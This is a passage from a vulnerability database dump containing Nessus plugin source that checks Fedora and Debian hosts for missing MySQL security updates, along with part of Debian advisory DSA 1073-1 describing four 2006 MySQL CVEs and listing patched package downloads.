(deb_check(release:\"3.1\", prefix:\"libmysqlclient14-dev\", reference:\"4.1.11a-4sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mysql-client-4.1\", reference:\"4.1.11a-4sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mysql-common-4.1\", reference:\"4.1.11a-4sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mysql-server-4.1\", reference:\"4.1.11a-4sarge3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:05:59", "description": "5.0.21 fixes several moderate-severity security issues: see\nCVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518, and our bugs\n181335 182025 189054 190866 190868 190870\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "published": "2007-01-17T00:00:00", "title": "Fedora Core 5 : mysql-5.0.21-2.FC5.1 (2006-553)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2007-01-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mysql-devel", "p-cpe:/a:fedoraproject:fedora:mysql-test", "cpe:/o:fedoraproject:fedora_core:5", "p-cpe:/a:fedoraproject:fedora:mysql", "p-cpe:/a:fedoraproject:fedora:mysql-server", "p-cpe:/a:fedoraproject:fedora:mysql-bench"], "id": "FEDORA_2006-553.NASL", "href": "https://www.tenable.com/plugins/nessus/24105", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2006-553.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24105);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2006-553\");\n\n script_name(english:\"Fedora Core 5 : mysql-5.0.21-2.FC5.1 (2006-553)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"5.0.21 fixes several moderate-severity security issues: see\nCVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518, and our bugs\n181335 182025 189054 190866 190868 190870\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2006-May/000078.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1af83b43\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 5.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC5\", reference:\"mysql-5.0.21-2.FC5.1\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"mysql-bench-5.0.21-2.FC5.1\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"mysql-devel-5.0.21-2.FC5.1\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"mysql-server-5.0.21-2.FC5.1\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"mysql-test-5.0.21-2.FC5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-devel / mysql-server / mysql-test\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:05:59", "description": "4.1.19 fixes several moderate-severity security issues: see\nCVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518, also our bugs\n180467 180639 182025 183261 190866 190868 190870\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "published": "2007-01-17T00:00:00", "title": "Fedora Core 4 : mysql-4.1.19-1.FC4.1 (2006-554)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2007-01-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mysql-devel", "p-cpe:/a:fedoraproject:fedora:mysql", "cpe:/o:fedoraproject:fedora_core:4", "p-cpe:/a:fedoraproject:fedora:mysql-server", "p-cpe:/a:fedoraproject:fedora:mysql-bench"], "id": "FEDORA_2006-554.NASL", "href": "https://www.tenable.com/plugins/nessus/24106", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2006-554.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24106);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2006-554\");\n\n script_name(english:\"Fedora Core 4 : mysql-4.1.19-1.FC4.1 (2006-554)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"4.1.19 fixes several moderate-severity security issues: see\nCVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518, also our bugs\n180467 180639 182025 183261 190866 190868 190870\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2006-May/000079.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?917bd654\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 4.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC4\", reference:\"mysql-4.1.19-1.FC4.1\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"mysql-bench-4.1.19-1.FC4.1\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"mysql-devel-4.1.19-1.FC4.1\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"mysql-server-4.1.19-1.FC4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-devel / mysql-server\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:44:37", "description": "Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems :\n\n - CVE-2006-0903\n Improper handling of SQL queries containing the NULL\n character allows local users to bypass logging\n mechanisms.\n\n - CVE-2006-1516\n Usernames without a trailing null byte allow remote\n attackers to read portions of memory.\n\n - CVE-2006-1517\n A request with an incorrect packet length allows remote\n attackers to obtain sensitive information.\n\n - CVE-2006-1518\n Specially crafted request packets with invalid length\n values allow the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed :\n\n woody sarge sid \n mysql 3.23.49-8.15 n/a n/a \n mysql-dfsg n/a 4.0.24-10sarge2 n/a \n mysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a \n mysql-dfsg-5.0 n/a n/a 5.0.21-3", "edition": 25, "published": "2006-10-14T00:00:00", "title": "Debian DSA-1079-1 : mysql-dfsg - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2006-10-14T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:mysql-dfsg"], "id": "DEBIAN_DSA-1079.NASL", "href": "https://www.tenable.com/plugins/nessus/22621", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1079. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22621);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-0903\", \"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_bugtraq_id(16850, 17780);\n script_xref(name:\"CERT\", value:\"602457\");\n script_xref(name:\"DSA\", value:\"1079\");\n\n script_name(english:\"Debian DSA-1079-1 : mysql-dfsg - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems :\n\n - CVE-2006-0903\n Improper handling of SQL queries containing the NULL\n character allows local users to bypass logging\n mechanisms.\n\n - CVE-2006-1516\n Usernames without a trailing null byte allow remote\n attackers to read portions of memory.\n\n - CVE-2006-1517\n A request with an incorrect packet length allows remote\n attackers to obtain sensitive information.\n\n - CVE-2006-1518\n Specially crafted request packets with invalid length\n values allow the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed :\n\n woody sarge sid \n mysql 3.23.49-8.15 n/a n/a \n mysql-dfsg n/a 4.0.24-10sarge2 n/a \n mysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a \n mysql-dfsg-5.0 n/a n/a 5.0.21-3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366044\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366049\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=366163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1516\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-1518\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1079\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the mysql packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mysql-dfsg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"libmysqlclient12\", reference:\"4.0.24-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libmysqlclient12-dev\", reference:\"4.0.24-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mysql-client\", reference:\"4.0.24-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mysql-common\", reference:\"4.0.24-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mysql-server\", reference:\"4.0.24-10sarge2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:23:52", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1073-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMay 22nd, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : mysql-dfsg-4.1\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE IDs : CVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518\nCERT advisory : VU#602457\nBugTraq IDs : 16850 17780\nDebian Bugs : 366043 366048 366162\n\nSeveral vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems:\n\nCVE-2006-0903\n\n Improper handling of SQL queries containing the NULL character\n allow local users to bypass logging mechanisms.\n\nCVE-2006-1516\n\n Usernames without a trailing null byte allow remote attackers to\n read portions of memory.\n\nCVE-2006-1517\n\n A request with an incorrect packet length allows remote attackers\n to obtain sensitive information.\n\nCVE-2006-1518\n\n Specially crafted request packets with invalid length values allow\n the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed:\n\n woody sarge sid\nmysql 3.23.49-8.15 n/a n/a\nmysql-dfsg n/a 4.0.24-10sarge2 n/a\nmysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a\nmysql-dfsg-5.0 n/a n/a 5.0.21-3\n\nWe recommend that you upgrade your mysql packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-dfsg-4.1_4.1.11a-4sarge3.dsc\n Size/MD5 checksum: 1029 fe1531d1b5169733638e64b98a0f2472\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-dfsg-4.1_4.1.11a-4sarge3.diff.gz\n Size/MD5 checksum: 166194 9ebbc861250d2e411a5e35cb7fc7fa6b\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-dfsg-4.1_4.1.11a.orig.tar.gz\n Size/MD5 checksum: 15771855 3c0582606a8903e758c2014c2481c7c3\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-common-4.1_4.1.11a-4sarge3_all.deb\n Size/MD5 checksum: 36074 dfb28c5169a7eaffd8fe72748a4a8a44\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14_4.1.11a-4sarge3_alpha.deb\n Size/MD5 checksum: 1590330 f982bc8df8b3ff88b6284e81223d69b5\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14-dev_4.1.11a-4sarge3_alpha.deb\n Size/MD5 checksum: 7965144 881d5404f897d454100ee9a0b758b22b\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-client-4.1_4.1.11a-4sarge3_alpha.deb\n Size/MD5 checksum: 1000496 30eb22210f99994481d1cb8d0f49ea70\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-server-4.1_4.1.11a-4sarge3_alpha.deb\n Size/MD5 checksum: 17487728 c0a3b1d60dd487ae9d468dc7052c4c1b\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14_4.1.11a-4sarge3_amd64.deb\n Size/MD5 checksum: 1451580 f407ef8b6c520b23020df6f8ce4495aa\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14-dev_4.1.11a-4sarge3_amd64.deb\n Size/MD5 checksum: 5551440 d1ded46c8b586cdee728fab22180208f\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-client-4.1_4.1.11a-4sarge3_amd64.deb\n Size/MD5 checksum: 849082 9161807c8c260e7e0e2cd0cb9fa3a79d\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-server-4.1_4.1.11a-4sarge3_amd64.deb\n Size/MD5 checksum: 14711044 d2d9275ff03c2c04adb64658a7e78564\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14_4.1.11a-4sarge3_arm.deb\n Size/MD5 checksum: 1388548 d823fd3ad8b1c5d54bfd7dbfc0957809\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14-dev_4.1.11a-4sarge3_arm.deb\n Size/MD5 checksum: 5558362 4f49eae43b10441c852a91f02d9383fc\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-client-4.1_4.1.11a-4sarge3_arm.deb\n Size/MD5 checksum: 836292 8616c375f5da29fac8c75081475390e8\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-server-4.1_4.1.11a-4sarge3_arm.deb\n Size/MD5 checksum: 14557420 ac1dd6ea1d457a55f0920cf5367df57a\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14_4.1.11a-4sarge3_i386.deb\n Size/MD5 checksum: 1417574 c6bdb99fa2ab2def5403bfd97657b3bf\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14-dev_4.1.11a-4sarge3_i386.deb\n Size/MD5 checksum: 5643226 a407082ba8a04f1753f70fe9c8e3f70c\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-client-4.1_4.1.11a-4sarge3_i386.deb\n Size/MD5 checksum: 830226 997baad8b8255166dfebd155f24c7558\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-server-4.1_4.1.11a-4sarge3_i386.deb\n Size/MD5 checksum: 14557608 c73ddde57d286c9df3742d5fd619281b\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14_4.1.11a-4sarge3_ia64.deb\n Size/MD5 checksum: 1712842 eef94aab0159f71a9fd90772f91b4a76\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14-dev_4.1.11a-4sarge3_ia64.deb\n Size/MD5 checksum: 7782132 755cc9d914f6ae116d5540920bf8dc99\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-client-4.1_4.1.11a-4sarge3_ia64.deb\n Size/MD5 checksum: 1050204 b2ee7722223cb450f866ce69852fe304\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-server-4.1_4.1.11a-4sarge3_ia64.deb\n Size/MD5 checksum: 18475254 c72ffcb6e1e7796b466950aceae48bb3\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14_4.1.11a-4sarge3_hppa.deb\n Size/MD5 checksum: 1550772 a7627788d338b1ee32017bbafcdd1bcd\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14-dev_4.1.11a-4sarge3_hppa.deb\n Size/MD5 checksum: 6249776 3d4fc83da65ac4fe5a4b6135a20debf8\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-client-4.1_4.1.11a-4sarge3_hppa.deb\n Size/MD5 checksum: 909638 ebf27138ed29103d90e6be0f5a8e28a0\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-server-4.1_4.1.11a-4sarge3_hppa.deb\n Size/MD5 checksum: 15791200 3be40e327c9c309556f9b767fe6b8e58\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14_4.1.11a-4sarge3_m68k.deb\n Size/MD5 checksum: 1397530 e0e5f01d008cd40ee38b7e7a30f5d69e\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14-dev_4.1.11a-4sarge3_m68k.deb\n Size/MD5 checksum: 5283788 d4186f7a2c0c231d4376087a51b74a5a\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-client-4.1_4.1.11a-4sarge3_m68k.deb\n Size/MD5 checksum: 803448 772bd59ae1d8ea5af95dc2b416661608\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-server-4.1_4.1.11a-4sarge3_m68k.deb\n Size/MD5 checksum: 14071540 766cce55819838830b209a23b343c5c2\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14_4.1.11a-4sarge3_mips.deb\n Size/MD5 checksum: 1478502 618699397eb82eead99acf01c4d25f59\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14-dev_4.1.11a-4sarge3_mips.deb\n Size/MD5 checksum: 6052694 7fe59dab19ac323389bdbefefcb2f472\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-client-4.1_4.1.11a-4sarge3_mips.deb\n Size/MD5 checksum: 904080 d140aaa93ad6fc52372b6860f5196685\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-server-4.1_4.1.11a-4sarge3_mips.deb\n Size/MD5 checksum: 15410072 ffd30ff403a343eda1467d543a9485bc\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14_4.1.11a-4sarge3_mipsel.deb\n Size/MD5 checksum: 1445934 a5642a17a417b705c53b6689727f28d9\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14-dev_4.1.11a-4sarge3_mipsel.deb\n Size/MD5 checksum: 5971150 cb94a8fac63741d802344a41758108e1\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-client-4.1_4.1.11a-4sarge3_mipsel.deb\n Size/MD5 checksum: 889688 bf8b2046d3da235c9717342c0fe802d7\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-server-4.1_4.1.11a-4sarge3_mipsel.deb\n Size/MD5 checksum: 15104986 c67d26b51c37892ced55a971c3e2ed73\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14_4.1.11a-4sarge3_powerpc.deb\n Size/MD5 checksum: 1476442 b6365d6bef0817718550fd344151b3a6\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14-dev_4.1.11a-4sarge3_powerpc.deb\n Size/MD5 checksum: 6027254 